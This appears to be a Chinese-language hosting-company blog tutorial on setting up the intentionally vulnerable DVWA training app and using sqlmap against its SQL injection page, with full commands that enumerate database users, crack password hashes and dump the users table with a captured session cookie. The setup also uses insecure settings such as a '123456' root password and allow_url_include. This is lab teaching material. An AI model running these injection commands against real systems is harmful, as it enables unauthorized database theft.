溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶(hù)服務(wù)條款》

測(cè)試演練系統(tǒng)DVWA流程

發(fā)布時(shí)間:2020-04-27 14:07:35 來(lái)源:億速云 閱讀:387 作者:三月 欄目:數(shù)據(jù)庫(kù)

下文內(nèi)容主要給大家?guī)?lái)測(cè)試演練系統(tǒng)DVWA流程,這里所講到的知識(shí),與書(shū)籍略有不同,都是億速云專(zhuān)業(yè)技術(shù)人員在與用戶(hù)接觸過(guò)程中,總結(jié)出來(lái)的,具有一定的經(jīng)驗(yàn)分享價(jià)值,希望給廣大讀者帶來(lái)幫助。

一、部署***測(cè)試演練系統(tǒng)DVWA


1. 下載DVWA軟件包

    官方下載地址:http://www.dvwa.co.uk/,當(dāng)前最新版本為:DVWA-1.9

    wget https://codeload.github.com/ethicalhack3r/DVWA/zip/master


2. 部署linux環(huán)境

    yum install -y httpd mysql mysql-server php php-mysql php-gd


3. 開(kāi)啟httpd和mysqld服務(wù)

    service httpd start

    service mysqld start

測(cè)試演練系統(tǒng)DVWA流程

4. 測(cè)試htttp對(duì)php的解析,瀏覽器訪問(wèn)http://ip/test.php正常

    vim /var/www/html/test.php

    寫(xiě)入:

   <?php

     phpinfo();

   ?>


5. 修改mysql的密碼

     mysqladmin -uroot password "123456"


6. 將DVWA-1.9.zip解壓至/var/www/html,并修改屬主為apache

     unzip DVWA-1.9.zip -d /var/www/html

    chown -R apache:apache /var/www/html/DVWA-1.9


7. 修改DVWA配置文件數(shù)據(jù)庫(kù)密碼為123456

    vim /var/www/html/DVWA-1.9/config/config.inc.php

    修改密碼:

    $_DVWA[ 'db_password' ] = '123456';

 測(cè)試演練系統(tǒng)DVWA流程


8. 進(jìn)入DVWA的web安裝界面,http://ip/DVWA-1.9/setup.php,發(fā)現(xiàn)報(bào)錯(cuò)    

 測(cè)試演練系統(tǒng)DVWA流程


   解決方法:

   1)編輯php的配置文件 vim /etc/php.ini

        allow_url_include = On

 測(cè)試演練系統(tǒng)DVWA流程


   2)編輯DVWA配置文件 vim /var/www/html/DVWA-1.9/config/config.inc.php

        找到創(chuàng)建公鑰和私鑰的鏈接:https://www.google.com/recaptcha/admin/create申請(qǐng)后填寫(xiě)在配置文件中:

       公鑰:6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb

                  私鑰:6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k

 測(cè)試演練系統(tǒng)DVWA流程


測(cè)試演練系統(tǒng)DVWA流程

測(cè)試演練系統(tǒng)DVWA流程

    


9. 重啟http,使修改的配置文件生效,刷新web界面,錯(cuò)誤消除

    service httpd restart

 測(cè)試演練系統(tǒng)DVWA流程


10. 點(diǎn)擊Create/Reset Database,自動(dòng)跳轉(zhuǎn)到登錄界面,默認(rèn)用戶(hù)名/密碼:admin/password

      至此,DVWA已部署完成

      測(cè)試演練系統(tǒng)DVWA流程



二、安裝SQLmap漏洞查看工具

 

1. 官方下載:http://sqlmap.org/http://sqlmap.org/

     版本:sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz


2.  解壓sqlmap,并執(zhí)行

      說(shuō)明:該工具是用python寫(xiě)的,需安裝python,它不是編譯型語(yǔ)言,而是執(zhí)行性語(yǔ)言,直接運(yùn)行

     測(cè)試演練系統(tǒng)DVWA流程


      命令 tar -zxvf  sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

      命令 ./sqlmap.py

      測(cè)試演練系統(tǒng)DVWA流程


3. 設(shè)置命令別名,修改vim /etc/profile,直接使用sqlmap命令

     命令 alias sqlmap='python /usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'

     命令 source /etc/profile  

      測(cè)試演練系統(tǒng)DVWA流程



三、實(shí)戰(zhàn)

        實(shí)戰(zhàn)1:枚舉登錄MYSQL數(shù)據(jù)的用戶(hù)名與密碼

        實(shí)戰(zhàn)2:枚舉所有數(shù)據(jù)庫(kù)

        實(shí)戰(zhàn)3:枚舉指定數(shù)據(jù)庫(kù)的數(shù)據(jù)表

        實(shí)戰(zhàn)4:獲取指定數(shù)據(jù)庫(kù)和表中所有列的信息

        實(shí)戰(zhàn)5:枚舉指定數(shù)據(jù)表中的所有用戶(hù)名與密碼


       環(huán)境準(zhǔn)備:

       1)登錄http://192.168.1.124/DVWA-1.9,將安全級(jí)別設(shè)置為最低;


       2)開(kāi)啟Firefox瀏覽器TamperData插件,等待獲取cookies值;


       3)在【SQL Injection】項(xiàng)中,提交User ID為22(地址欄出現(xiàn)id=22,這就是MySQL的注入點(diǎn))

             獲得注入點(diǎn):http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#


       4)TamperData彈窗獲取cookies值:security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552


        

測(cè)試演練系統(tǒng)DVWA流程


測(cè)試演練系統(tǒng)DVWA流程



實(shí)戰(zhàn)1:枚舉登錄MYSQL數(shù)據(jù)的用戶(hù)名與密碼

   sqlmap語(yǔ)法參數(shù):

  • -u :指定目標(biāo)URL,即注入點(diǎn)

  • --cookies:當(dāng)前會(huì)話(huà)的cookies值

  • -b:獲取數(shù)據(jù)庫(kù)類(lèi)型,檢索數(shù)據(jù)庫(kù)管理系統(tǒng)標(biāo)識(shí)

  • --current-db:獲取當(dāng)前數(shù)據(jù)庫(kù)

  • --current-user:獲取當(dāng)前登錄數(shù)據(jù)庫(kù)使用的用戶(hù)


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' -b  --current-db  --current-user


說(shuō)明:根據(jù)提示回復(fù)Y,繼續(xù)


測(cè)試演練系統(tǒng)DVWA流程


結(jié)果:得到當(dāng)前數(shù)據(jù)庫(kù)為dawa,使用的用戶(hù)為root@localhost


測(cè)試演練系統(tǒng)DVWA流程



實(shí)戰(zhàn)2:枚舉所有數(shù)據(jù)庫(kù)

   sqlmap語(yǔ)法參數(shù):

  • --users:枚舉數(shù)據(jù)庫(kù)用戶(hù)名

  • -password:枚舉數(shù)據(jù)庫(kù)用戶(hù)的密碼(hash)

   

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" --users --password

測(cè)試演練系統(tǒng)DVWA流程


說(shuō)明:選擇目錄下字典文件,暴力破解


測(cè)試演練系統(tǒng)DVWA流程


結(jié)果:數(shù)據(jù)庫(kù)用戶(hù)名為root,密碼也有明文形式123456


測(cè)試演練系統(tǒng)DVWA流程



實(shí)戰(zhàn)3:枚舉數(shù)據(jù)庫(kù)和指定數(shù)據(jù)庫(kù)的數(shù)據(jù)表

   sqlmap語(yǔ)法參數(shù):

  • --dbs:枚舉當(dāng)前數(shù)據(jù)庫(kù)


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" --dbs


結(jié)果:mysql下所有的數(shù)據(jù)庫(kù)

測(cè)試演練系統(tǒng)DVWA流程


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa --tables


結(jié)果:dvwa庫(kù)中,所有的表

測(cè)試演練系統(tǒng)DVWA流程


實(shí)戰(zhàn)4:獲取指定數(shù)據(jù)庫(kù)和表中所有列的信息

   sqlmap語(yǔ)法參數(shù):

  • -D:指定的數(shù)據(jù)庫(kù)

  • -T:指定數(shù)據(jù)庫(kù)中的數(shù)據(jù)表

  • --columns:獲取列的信息


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa -T users --columns


結(jié)果:dvwa庫(kù),users表中所有字段信息

測(cè)試演練系統(tǒng)DVWA流程



實(shí)戰(zhàn)5:枚舉指定數(shù)據(jù)表中的所有用戶(hù)名與密碼

   sqlmap語(yǔ)法參數(shù):

  • -C:枚舉數(shù)據(jù)表中的列

  • --dump:存儲(chǔ)數(shù)據(jù)表項(xiàng)


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump


結(jié)果:dvwa庫(kù),users表中user字段和password字段信息,最后表中信息轉(zhuǎn)存文件中

測(cè)試演練系統(tǒng)DVWA流程

對(duì)于以上關(guān)于測(cè)試演練系統(tǒng)DVWA流程,如果大家還有更多需要了解的可以持續(xù)關(guān)注我們億速云的行業(yè)推新,如需獲取專(zhuān)業(yè)解答,可在官網(wǎng)聯(lián)系售前售后的,希望該文章可給大家?guī)?lái)一定的知識(shí)更新。

 

 

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI